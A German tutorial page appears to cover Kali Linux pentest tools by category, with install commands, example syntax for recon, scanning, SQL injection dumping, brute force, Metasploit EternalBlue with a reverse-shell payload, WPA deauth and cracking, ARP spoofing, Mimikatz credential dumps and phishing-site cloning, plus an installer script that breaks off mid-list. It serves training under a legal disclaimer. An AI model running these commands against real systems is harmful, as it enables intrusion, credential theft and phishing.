Skip to main content

Kali Linux Pentest Tools – Vollständige Anleitung

Diese Anleitung deckt alle wichtigen Penetration-Testing-Tools auf Kali Linux ab – kategorisiert nach Einsatzbereich, mit Installationsbefehl, Basis-Syntax und typischen Anwendungsfällen. Am Ende befindet sich ein vollständiges Installations-Script, das alle Tools in einem Befehl einrichtet.

⚠️ Rechtlicher Hinweis
Alle hier beschriebenen Tools dürfen ausschließlich auf eigenen Systemen oder mit expliziter schriftlicher Genehmigung des Eigentümers eingesetzt werden. Unbefugtes Eindringen in fremde Systeme ist in Deutschland gemäß § 202a / 202b / 202c StGB strafbar und kann mit bis zu 3 Jahren Freiheitsstrafe bestraft werden. Übe in isolierten Lab-Umgebungen wie TryHackMe, Hack The Box oder mit lokalen VMs (Metasploitable, DVWA).


Inhaltsverzeichnis

  1. Reconnaissance & Information Gathering
  2. Netzwerk-Scanning & Enumeration
  3. Web Application Testing
  4. Fuzzing & Directory Bruteforce
  5. Exploitation Frameworks
  6. Passwort-Angriffe & Cracking
  7. Wireless & WLAN-Angriffe
  8. Sniffing & Traffic-Analyse
  9. Post-Exploitation
  10. Forensics & Reverse Engineering
  11. Social Engineering
  12. Alles-in-einem Installations-Script

1. Reconnaissance & Information Gathering

Die erste Phase jedes Pentests: so viele Informationen wie möglich über das Ziel sammeln, bevor aktiv gescannt oder angegriffen wird.

theHarvester

Eigenschaft Details
Einsatz E-Mail-Adressen, Subdomains, IPs, URLs aus öffentlichen Quellen sammeln
Quellen Google, Bing, LinkedIn, Shodan, Hunter.io, VirusTotal u.v.m.
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y theharvester

# E-Mails und Subdomains für eine Domain sammeln
theHarvester -d beispiel.de -b google,bing,linkedin -l 500

# Alle verfügbaren Quellen nutzen
theHarvester -d beispiel.de -b all

Maltego

Eigenschaft Details
Einsatz Grafische OSINT-Analyse – Beziehungen zwischen Personen, Domains, IPs, Firmen
Besonderheit GUI-Tool mit Transform-System; Community-Version kostenlos
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y maltego
maltego   # startet die GUI

Recon-ng

Eigenschaft Details
Einsatz Modulares OSINT-Framework (ähnlich wie Metasploit für Recon)
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y recon-ng
recon-ng

# In der Konsole:
[recon-ng] > marketplace search domains
[recon-ng] > modules load recon/domains-hosts/hackertarget
[recon-ng] > options set SOURCE beispiel.de
[recon-ng] > run

Shodan CLI

Eigenschaft Details
Einsatz Suche nach öffentlich erreichbaren Geräten, offenen Ports, Banner-Infos
Hinweis API-Key von shodan.io erforderlich (kostenloser Plan verfügbar)
sudo pip3 install shodan
shodan init DEIN_API_KEY

# Nach verwundbaren Diensten suchen
shodan search apache 2.2
shodan host 1.2.3.4

DNSrecon

Eigenschaft Details
Einsatz DNS-Enumeration: Zone Transfer, Brute-Force, Reverse Lookup
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y dnsrecon

# Standard-Scan
dnsrecon -d beispiel.de

# Zone Transfer versuchen
dnsrecon -d beispiel.de -t axfr

# DNS-Brute-Force
dnsrecon -d beispiel.de -t brt -D /usr/share/wordlists/dnsmap.txt

Sublist3r

Eigenschaft Details
Einsatz Subdomains über OSINT-Quellen (Google, Bing, Virustotal, Netcraft) finden
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y sublist3r

sublist3r -d beispiel.de
sublist3r -d beispiel.de -o subdomains.txt   # Output in Datei

Amass

Eigenschaft Details
Einsatz Umfassende Attack-Surface-Erkennung; Subdomains, ASNs, IP-Ranges
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y amass

amass enum -d beispiel.de
amass enum -d beispiel.de -o ergebnis.txt
amass intel -d beispiel.de   # OSINT-Modus

2. Netzwerk-Scanning & Enumeration

Nmap

Eigenschaft Details
Einsatz Der Standard für Netzwerk-Scanning: Ports, Services, OS-Erkennung, Scripts
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y nmap

# Schneller Scan (Top 1000 Ports)
nmap -T4 -F 192.168.1.1

# Vollständiger Scan mit Service- und OS-Erkennung
nmap -T4 -A -v 192.168.1.0/24

# Stealth SYN-Scan + Versionserkennung
sudo nmap -sS -sV -p- 192.168.1.1

# Vulnerability-Scan mit NSE-Scripts
nmap --script vuln 192.168.1.1

# Alle offenen Ports speichern
nmap -p- -oN ergebnis.txt 192.168.1.1

Nmap Spickzettel
-sS = SYN-Scan (Stealth) | -sV = Versionserkennung | -O = OS-Erkennung | -A = Alles | -p- = Alle 65535 Ports | -T4 = Schnell | -oN = Output als Text

Masscan

Eigenschaft Details
Einsatz Extrem schneller Port-Scanner – scannt das gesamte Internet in Minuten
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y masscan

# Schneller Scan eines Subnetzes
sudo masscan 192.168.1.0/24 -p80,443,22,21 --rate=1000

# Alle Ports scannen
sudo masscan 192.168.1.1 -p0-65535 --rate=10000

Netdiscover

Eigenschaft Details
Einsatz Aktive/Passive Hosts im lokalen Netz per ARP entdecken
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y netdiscover

sudo netdiscover -r 192.168.1.0/24
sudo netdiscover -i eth0 -p   # Passiver Modus (kein Traffic erzeugt)

Enum4linux

Eigenschaft Details
Einsatz SMB/Samba-Enumeration: Benutzer, Gruppen, Shares auf Windows/Linux
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y enum4linux

enum4linux -a 192.168.1.10        # Vollständige Enumeration
enum4linux -U 192.168.1.10        # Nur Benutzer
enum4linux -S 192.168.1.10        # Nur Shares

Impacket

Eigenschaft Details
Einsatz Python-Toolset für Windows-Protokolle: SMB, MSRPC, NTLM, Kerberos
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y impacket-scripts

# Passwort-Hashes aus SAM-Datenbank dumpen
impacket-secretsdump administrator:passwort@192.168.1.10

# Pass-the-Hash Angriff
impacket-psexec -hashes :NTLM-HASH administrator@192.168.1.10

# Kerberoasting
impacket-GetUserSPNs domain.local/benutzer:passwort -dc-ip 192.168.1.10 -request

3. Web Application Testing

Nikto

Eigenschaft Details
Einsatz Webserver auf 6.700+ bekannte Schwachstellen, Fehlkonfigurationen und veraltete Software prüfen
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y nikto

nikto -h https://zielseite.de
nikto -h https://zielseite.de -o ergebnis.html -Format html
nikto -h https://zielseite.de -ssl -Tuning 1234

SQLmap

Eigenschaft Details
Einsatz Automatisches Erkennen und Ausnutzen von SQL-Injection-Schwachstellen
Datenbanken MySQL, PostgreSQL, MSSQL, Oracle, SQLite und mehr
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y sqlmap

# Grundlegender Test
sqlmap -u "https://seite.de/page?id=1"

# Datenbanken auflisten
sqlmap -u "https://seite.de/page?id=1" --dbs

# Tabellen einer Datenbank auflisten
sqlmap -u "https://seite.de/page?id=1" -D datenbankname --tables

# Daten aus Tabelle dumpen
sqlmap -u "https://seite.de/page?id=1" -D datenbankname -T tabellenname --dump

# POST-Request testen
sqlmap -u "https://seite.de/login" --data="user=admin&pass=test" --dbs

# Mit Burp-Request-Datei
sqlmap -r request.txt --dbs --level=5 --risk=3

WPScan

Eigenschaft Details
Einsatz WordPress-Scanner: Plugins, Themes, CVEs, Benutzernamen
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y wpscan

wpscan --url https://wordpress-seite.de
wpscan --url https://wordpress-seite.de --enumerate u        # Benutzernamen
wpscan --url https://wordpress-seite.de --enumerate p        # Plugins
wpscan --url https://wordpress-seite.de --enumerate vp       # Nur vulnerable Plugins
wpscan --url https://wordpress-seite.de --api-token TOKEN    # Mit API-Key für CVE-Daten
wpscan --url https://wordpress-seite.de -P /usr/share/wordlists/rockyou.txt -U admin  # Passwort-Brute

OWASP ZAP

Eigenschaft Details
Einsatz Interaktives Web-Proxying, automatische Scans, Spider, Active/Passive Scanner
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y zaproxy

# GUI starten
zaproxy

# Headless Spider + Active Scan (CLI)
zaproxy -cmd -quickurl https://zielseite.de -quickout ergebnis.html

Burp Suite (Community)

Eigenschaft Details
Einsatz HTTP-Proxy, Spider, Scanner, Intruder, Repeater – Industriestandard für Web-Pentesting
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y burpsuite

burpsuite   # startet die GUI

Burp Suite Setup
Proxy läuft standardmäßig auf 127.0.0.1:8080. Browser-Proxy auf diesen Port setzen und das Burp CA-Zertifikat unter Proxy → Options → CA Certificate installieren, um HTTPS-Traffic abzufangen.

Skipfish

Eigenschaft Details
Einsatz Aggressiver Web-Application-Scanner mit Sitemap-Erstellung
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y skipfish

skipfish -o ergebnis_ordner https://zielseite.de

Nuclei

Eigenschaft Details
Einsatz Template-basierter Scanner für bekannte CVEs und Fehlkonfigurationen
Vorinstalliert ✅ Ja (Kali, seit 2023)
sudo apt install -y nuclei

nuclei -u https://zielseite.de
nuclei -u https://zielseite.de -t cves/
nuclei -l urls.txt -severity high,critical
nuclei -update-templates   # Templates aktualisieren

4. Fuzzing & Directory Bruteforce

Gobuster

Eigenschaft Details
Einsatz Verzeichnisse, Dateien, vHosts, DNS-Subdomains per Brute-Force finden
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y gobuster

# Verzeichnis-Scan
gobuster dir -u https://zielseite.de -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Dateiendungen einschließen
gobuster dir -u https://zielseite.de -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak

# DNS-Subdomain-Scan
gobuster dns -d beispiel.de -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# vHost-Scan
gobuster vhost -u https://zielseite.de -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt

ffuf (Fuzz Faster U Fool)

Eigenschaft Details
Einsatz Extrem schnelles Web-Fuzzing: URLs, Parameter, Header, POST-Daten
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y ffuf

# Verzeichnisse finden
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u https://zielseite.de/FUZZ

# Parameter fuzzen
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "https://zielseite.de/page?FUZZ=wert"

# POST-Daten fuzzen (z.B. Login)
ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "username=admin&password=FUZZ" -u https://zielseite.de/login -fc 302

# Bestimmte Statuscodes filtern
ffuf -w wordlist.txt -u https://zielseite.de/FUZZ -fc 404 -mc 200,301,302

Dirsearch

Eigenschaft Details
Einsatz Versteckte Verzeichnisse und Dateien finden – einfache Bedienung
Vorinstalliert ✅ Ja (Kali, neuere Versionen)
sudo apt install -y dirsearch

dirsearch -u https://zielseite.de
dirsearch -u https://zielseite.de -e php,html,txt,bak,env
dirsearch -u https://zielseite.de -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt

Dirb

Eigenschaft Details
Einsatz Klassischer Web-Content-Scanner mit eingebauten Wortlisten
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y dirb

dirb https://zielseite.de
dirb https://zielseite.de /usr/share/wordlists/dirb/big.txt

Wfuzz

Eigenschaft Details
Einsatz Flexibles Web-Fuzzing-Framework: URLs, Header, Cookies, POST-Daten
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y wfuzz

# Verzeichnisse
wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 https://zielseite.de/FUZZ

# Parameter fuzzen
wfuzz -c -z file,/usr/share/wordlists/rockyou.txt -d "user=admin&pass=FUZZ" https://zielseite.de/login

5. Exploitation Frameworks

Metasploit Framework

Eigenschaft Details
Einsatz Das mächtigste Exploitation-Framework: 2.300+ Exploits, Payloads, Post-Exploitation
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y metasploit-framework

# PostgreSQL starten (für Workspace/Datenbank)
sudo systemctl start postgresql
sudo msfdb init

# Metasploit starten
msfconsole

# Innerhalb von msfconsole:
msf6 > search eternalblue                         # Exploits suchen
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit > show options                        # Parameter anzeigen
msf6 exploit > set RHOSTS 192.168.1.10
msf6 exploit > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit > set LHOST 192.168.1.100
msf6 exploit > run

# Nmap-Scan direkt aus Metasploit
msf6 > db_nmap -sV 192.168.1.0/24

Metasploit Datenbank
Vor dem ersten Start sudo msfdb init ausführen. Mit workspace -a meinprojekt können separate Workspaces für unterschiedliche Tests angelegt werden.

BeEF (Browser Exploitation Framework)

Eigenschaft Details
Einsatz Browser-Hacking über XSS-Hooks: Client-side-Angriffe demonstrieren
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y beef-xss

sudo beef-xss   # startet den Server
# Web-Interface: http://127.0.0.1:3000/ui/panel
# Standard-Login: beef / beef

SearchSploit / Exploit-DB

Eigenschaft Details
Einsatz Lokale Suche in der Exploit-DB – offline verfügbar
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y exploitdb

searchsploit apache 2.4
searchsploit -m 12345         # Exploit herunterladen (nach ID)
searchsploit --update         # Datenbank aktualisieren

6. Passwort-Angriffe & Cracking

Hydra

Eigenschaft Details
Einsatz Online-Brute-Force für SSH, FTP, HTTP, SMB, RDP, Telnet, SMTP u.v.m.
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y hydra

# SSH Brute-Force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10

# HTTP Login-Form
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 http-post-form "/login:user=^USER^&pass=^PASS^:Falsche Zugangsdaten"

# FTP mit Benutzerliste
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.10

# Mehrere Threads (-t) und Protokoll explizit
hydra -l admin -P passwortliste.txt -t 64 192.168.1.10 http-get /admin

John the Ripper

Eigenschaft Details
Einsatz Offline-Hash-Cracking: MD5, SHA, NTLM, bcrypt, ZIP, PDF, SSH-Keys
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y john

# Hash cracken mit Standard-Wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Hash-Typ manuell angeben
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# ZIP-Datei cracken
zip2john archiv.zip > zip_hash.txt
john zip_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# SSH-Key cracken
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Bereits gecrackte Passwörter anzeigen
john --show hashes.txt

Hashcat

Eigenschaft Details
Einsatz GPU-beschleunigtes Hash-Cracking – extrem schnell für NTLM, SHA256, bcrypt
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y hashcat

# MD5-Hashes mit Wordlist cracken (-m 0 = MD5)
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

# NTLM-Hashes (-m 1000 = NTLM)
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

# Brute-Force mit Maske (8 Zeichen, Zahlen+Buchstaben)
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a?a?a

# bcrypt (-m 3200)
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt --force

Hashcat Hash-Typen (Auswahl)
-m 0 = MD5 | -m 100 = SHA1 | -m 1000 = NTLM | -m 1800 = SHA-512 (Linux) | -m 3200 = bcrypt | -m 5600 = NetNTLMv2 | -m 22000 = WPA2

Medusa

Eigenschaft Details
Einsatz Paralleler Online-Brute-Forcer – Alternative zu Hydra
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y medusa

medusa -h 192.168.1.10 -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P passwortliste.txt -M ftp

CeWL

Eigenschaft Details
Einsatz Custom Wordlist Generator – crawlt eine Website und erstellt zielspezifische Wortlisten
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y cewl

cewl https://zielseite.de -d 2 -m 8 -o wordlist.txt
# -d = Tiefe | -m = Mindestlänge | -o = Ausgabedatei

Crunch

Eigenschaft Details
Einsatz Custom Wordlist nach Muster generieren (Kombinationen, Länge, Zeichensatz)
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y crunch

# 8-stellige Wortliste (a-z)
crunch 8 8 abcdefghijklmnopqrstuvwxyz -o wordlist.txt

# Mit Muster: Wort + 4 Ziffern
crunch 9 9 -t passwort%%%% -o wordlist.txt

7. Wireless & WLAN-Angriffe

Aircrack-ng Suite

Eigenschaft Details
Einsatz WLAN-Sicherheitstest: WEP/WPA2 cracken, Deauth, Packet Injection
Enthält airmon-ng, airodump-ng, aireplay-ng, aircrack-ng
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y aircrack-ng

# 1. Monitor-Modus aktivieren
sudo airmon-ng start wlan0

# 2. Netzwerke scannen
sudo airodump-ng wlan0mon

# 3. Spezifisches Netzwerk mitschneiden (BSSID + Channel angeben)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# 4. Deauthentication-Angriff (Client trennen, Handshake erzwingen)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# 5. WPA2-Handshake cracken
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake.cap

# Monitor-Modus beenden
sudo airmon-ng stop wlan0mon

Wifite

Eigenschaft Details
Einsatz Automatisierter WLAN-Angriff – nutzt Aircrack-ng im Hintergrund
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y wifite

sudo wifite
sudo wifite --wpa --dict /usr/share/wordlists/rockyou.txt

Kismet

Eigenschaft Details
Einsatz Wireless-Sniffer und IDS: WLAN, Bluetooth, Zigbee erkennen und loggen
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y kismet

sudo kismet -c wlan0
# Web-Interface: http://localhost:2501

Reaver

Eigenschaft Details
Einsatz WPS-PIN Brute-Force – greift Router mit aktiviertem WPS an
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y reaver

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

8. Sniffing & Traffic-Analyse

Wireshark

Eigenschaft Details
Einsatz Grafischer Netzwerk-Protokoll-Analyzer – der Standard für Packet-Capturing
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y wireshark

wireshark   # GUI starten

# Kommandozeile (tshark)
sudo tshark -i eth0 -w capture.pcap
sudo tshark -r capture.pcap -Y "http.request"         # HTTP-Requests filtern
sudo tshark -r capture.pcap -Y "ftp" -T fields -e ftp.request.arg  # FTP-Passwörter

Tcpdump

Eigenschaft Details
Einsatz Kommandozeilen-Packet-Capture – leichtgewichtig, auf jedem System verfügbar
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y tcpdump

sudo tcpdump -i eth0                                   # Alle Pakete auf eth0
sudo tcpdump -i eth0 -w capture.pcap                   # In Datei schreiben
sudo tcpdump -i eth0 port 80                           # Nur HTTP
sudo tcpdump -i eth0 host 192.168.1.10                 # Nur bestimmte IP
sudo tcpdump -r capture.pcap -n                        # Datei lesen

Bettercap

Eigenschaft Details
Einsatz Man-in-the-Middle-Framework: ARP-Spoofing, DNS-Spoofing, HTTP/HTTPS-Sniffing
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y bettercap

sudo bettercap -iface eth0

# In der Bettercap-Konsole:
> net.probe on              # Hosts im Netz entdecken
> net.show                  # Gefundene Hosts anzeigen
> set arp.spoof.targets 192.168.1.10
> arp.spoof on              # ARP-Spoofing starten (MITM)
> net.sniff on              # Traffic mitsniffen

Ettercap

Eigenschaft Details
Einsatz Klassisches MITM-Tool mit GUI: ARP-Poisoning, SSL-Stripping, Passwort-Sniffing
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y ettercap-graphical

sudo ettercap -G   # GUI
# oder
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.1// /192.168.1.10//

9. Post-Exploitation

Meterpreter (Metasploit)

Nach erfolgreicher Exploitation automatisch verfügbar über Metasploit. Ermöglicht Dateioperationen, Keylogging, Screenshot, Privilege Escalation.

# Nach erfolgreicher Shell in msfconsole:
meterpreter > sysinfo               # Systeminformationen
meterpreter > getuid                # Aktueller Benutzer
meterpreter > getsystem             # Privilege Escalation versuchen
meterpreter > hashdump              # Password-Hashes dumpen
meterpreter > screenshot            # Desktop-Screenshot
meterpreter > keyscan_start         # Keylogger starten
meterpreter > download /etc/passwd  # Datei herunterladen
meterpreter > upload shell.php /var/www/html/  # Datei hochladen

BloodHound

Eigenschaft Details
Einsatz Active Directory Attack Path Mapping – Grafische Darstellung von Angriffspfaden
Vorinstalliert ✅ Ja (Kali, seit 2025)
sudo apt install -y bloodhound

# Neo4j-Datenbank starten
sudo neo4j console &
bloodhound   # GUI starten
# Login: neo4j / neo4j (beim ersten Start Passwort ändern)

# Daten mit SharpHound sammeln (auf Windows-Zielsystem)
# SharpHound.exe -c All
# Resultierende ZIP in BloodHound GUI importieren

LinPEAS / WinPEAS (PEASS-ng)

Eigenschaft Details
Einsatz Automatische Privilege-Escalation-Suche auf Linux und Windows
# Herunterladen
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# Auf Zielsystem übertragen (per Meterpreter oder wget)
# Ergebnis nach SUID, cron jobs, schwachen Berechtigungen durchsuchen

Mimikatz (via Metasploit)

Passwort-Hashes und Klartext-Passwörter aus dem Windows-Speicher extrahieren.

# In Meterpreter (Windows-Ziel):
meterpreter > load kiwi
meterpreter > creds_all              # Alle Credentials dumpen
meterpreter > lsa_dump_sam           # SAM-Datenbank dumpen
meterpreter > lsa_dump_secrets       # LSA Secrets dumpen

10. Forensics & Reverse Engineering

Volatility

Eigenschaft Details
Einsatz Memory-Forensik: RAM-Dumps analysieren, Prozesse, Netzwerkverbindungen, Malware finden
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y volatility3

# Prozessliste aus RAM-Dump
vol -f memory.dmp windows.pslist

# Netzwerkverbindungen
vol -f memory.dmp windows.netstat

# Injected Code finden
vol -f memory.dmp windows.malfind

Binwalk

Eigenschaft Details
Einsatz Firmware-Analyse: Versteckte Dateien in Binärdateien/Images finden und extrahieren
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y binwalk

binwalk firmware.bin            # Analysieren
binwalk -e firmware.bin         # Extrahieren

Ghidra

Eigenschaft Details
Einsatz NSA-Reverse-Engineering-Framework: Disassembler, Decompiler für alle Architekturen
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y ghidra

ghidra   # GUI starten

Radare2

Eigenschaft Details
Einsatz Kommandozeilen-Disassembler und Debugger – extrem mächtig für Binär-Analyse
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y radare2

r2 binary            # Datei öffnen
[0x00000000]> aaa    # Analyse
[0x00000000]> afl    # Alle Funktionen auflisten
[0x00000000]> pdf @ main  # Funktion disassemblieren

Foremost

Eigenschaft Details
Einsatz File-Carving: Gelöschte Dateien aus Disk-Images wiederherstellen
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y foremost

foremost -i disk.img -o wiederhergestellt/
foremost -t jpg,png,pdf -i disk.img -o output/

11. Social Engineering

Social Engineering Toolkit (SET)

Eigenschaft Details
Einsatz Phishing-Seiten klonen, Spear-Phishing-E-Mails, credential harvesting
Vorinstalliert ✅ Ja (Kali)
sudo apt install -y set

sudo setoolkit
# Menüpunkte: 1 = Social-Engineering Attacks
# 2 = Website Attack Vectors
# 3 = Credential Harvester Attack Method
# 2 = Site Cloner → URL eingeben → Phishing-Seite wird lokal gehostet

Gophish

Eigenschaft Details
Einsatz Open-Source Phishing-Simulation Framework mit Web-Dashboard
Vorinstalliert ✅ Ja (Kali, seit 2025.3)
sudo apt install -y gophish

gophish
# Web-Dashboard: https://127.0.0.1:3333
# Standard-Login: admin (Passwort beim ersten Start im Terminal ausgegeben)

12. Alles-in-einem Installations-Script

Dieses Script installiert alle oben genannten Tools in einem einzigen Befehl auf Kali Linux (oder Debian/Ubuntu). Es prüft, ob Tools bereits installiert sind, loggt den Fortschritt und gibt am Ende eine Übersicht aus.

Voraussetzungen
Kali Linux (empfohlen) oder Debian/Ubuntu | Sudo-Rechte erforderlich | Aktive Internetverbindung | Mindestens 10 GB freier Speicher empfohlen

Script herunterladen und ausführen

# Script herunterladen und direkt ausführen (Einzeiler)
curl -s https://raw.githubusercontent.com/... | sudo bash

# ODER: Script erstellen und manuell ausführen
nano kali_pentest_install.sh   # Inhalt einfügen
chmod +x kali_pentest_install.sh
sudo ./kali_pentest_install.sh

Script-Inhalt

#!/usr/bin/env bash
# =============================================================================
# Kali Linux Pentest Tools – Master-Installations-Script
# Nyrux / Leon | github.com/nyrux
# Nutzung: sudo ./kali_pentest_install.sh
# =============================================================================

set -euo pipefail

# Farben
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
BOLD='\033[1m'
NC='\033[0m'

LOG_FILE="/var/log/pentest_install_$(date +%Y%m%d_%H%M%S).log"
FAILED_TOOLS=()
SUCCESS_COUNT=0

# Root-Check
if [[ $EUID -ne 0 ]]; then
    echo -e "${RED}[FEHLER]${NC} Bitte als root oder mit sudo ausführen."
    exit 1
fi

log() { echo -e "$1" | tee -a "$LOG_FILE"; }
info()    { log "${CYAN}[INFO]${NC}  $1"; }
success() { log "${GREEN}[OK]${NC}    $1"; ((SUCCESS_COUNT++)); }
warn()    { log "${YELLOW}[WARN]${NC}  $1"; }
error()   { log "${RED}[FEHLER]${NC} $1"; }

banner() {
    echo -e "${BOLD}${CYAN}"
    echo "╔══════════════════════════════════════════════════════════╗"
    echo "║        Kali Linux Pentest Tools – Installer              ║"
    echo "║        Nyrux | github.com/nyrux                          ║"
    echo "╚══════════════════════════════════════════════════════════╝"
    echo -e "${NC}"
}

# APT-Pakete installieren (mit Fehlerbehandlung)
install_apt() {
    local package="$1"
    if dpkg -s "$package" &>/dev/null; then
        warn "$package bereits installiert – übersprungen."
        ((SUCCESS_COUNT++))
        return 0
    fi
    info "Installiere: $package"
    if apt-get install -y "$package" >> "$LOG_FILE" 2>&1; then
        success "$package erfolgreich installiert."
    else
        error "$package konnte nicht installiert werden."
        FAILED_TOOLS+=("$package")
    fi
}

# Abschnitt-Header
section() {
    echo ""
    log "${BOLD}${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    log "${BOLD}${CYAN}  $1${NC}"
    log "${BOLD}${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
}

# =============================================================================
banner
log "Logfile: $LOG_FILE"
log "Start: $(date)"

# System aktualisieren
section "System aktualisieren"
info "apt-get update && apt-get upgrade..."
apt-get update -qq >> "$LOG_FILE" 2>&1
apt-get upgrade -y -qq >> "$LOG_FILE" 2>&1
success "System aktualisiert."

# =============================================================================
section "Basis-Abhängigkeiten"
BASE_DEPS=(
    git curl wget python3 python3-pip python3-venv
    build-essential libssl-dev libffi-dev
    ruby ruby-dev gem
    golang-go
    apt-transport-https ca-certificates gnupg
    net-tools dnsutils whois traceroute
)
for pkg in "${BASE_DEPS[@]}"; do install_apt "$pkg"; done

# =============================================================================
section "Reconnaissance & OSINT"
RECON_TOOLS=(
    theharvester
    maltego
    recon-ng
    sublist3r
    amass
    dnsrecon
    dnsenum
    dmitry
    whatweb
)
for pkg in "${RECON_TOOLS[@]}"; do install_apt "$pkg"; done

# Shodan CLI (pip)
info "Installiere Shodan CLI (pip)..."
pip3 install --quiet shodan >> "$LOG_FILE" 2>&1 && success "shodan (pip) installiert." || { error "shodan (pip) fehlgeschlagen."; FAILED_TOOLS+=("shodan-pip"); }

# =============================================================================
section "Netzwerk-Scanning & Enumeration"
NET_TOOLS=(
    nmap
    masscan
    netdiscover
    arp-scan
    hping3
    enum4linux
    impacket-scripts
    nbtscan
    onesixtyone
    snmpwalk
)
for pkg in "${NET_TOOLS[@]}"; do install_apt "$pkg"; done

# =============================================================================
section "Web Application Testing"
WEB_TOOLS=(
    nikto
    sqlmap
    wpscan
    zaproxy
    burpsuite
    skipfish
    nuclei
    whatweb
    wapiti
)
for pkg in "${WEB_TOOLS[@]}"; do install_apt "$pkg"; done

# =============================================================================
section "Fuzzing & Directory Bruteforce"
FUZZ_TOOLS=(
    gobuster
    ffuf
    dirsearch
    dirb
    wfuzz
    feroxbuster
)
for pkg in "${FUZZ_TOOLS[@]}"; do install_apt "$pkg"; done

# SecLists Wortlisten
if [[ ! -d "/usr/share/seclists" ]]; then
    info "Installiere SecLists Wortlisten..."
    install_apt seclists
else
    warn "SecLists bereits vorhanden – übersprungen."
    ((SUCCESS_COUNT++))
fi

# =============================================================================
section "Exploitation Frameworks"
EXPLOIT_TOOLS=(
    metasploit-framework
    beef-xss
    exploitdb
)
for pkg in "${EXPLOIT_TOOLS[@]}"; do install_apt "$pkg"; done

# Metasploit Datenbank initialisieren
info "PostgreSQL für Metasploit starten..."
systemctl enable postgresql >> "$LOG_FILE" 2>&1
systemctl start postgresql >> "$LOG_FILE" 2>&1
msfdb init >> "$LOG_FILE" 2>&1 && success "Metasploit Datenbank initialisiert." || warn "msfdb init übersprungen (evtl. bereits vorhanden)."

# =============================================================================
section "Passwort-Angriffe & Cracking"
PASS_TOOLS=(
    hydra
    john
    hashcat
    medusa
    cewl
    crunch
    ophcrack
    wordlists
)
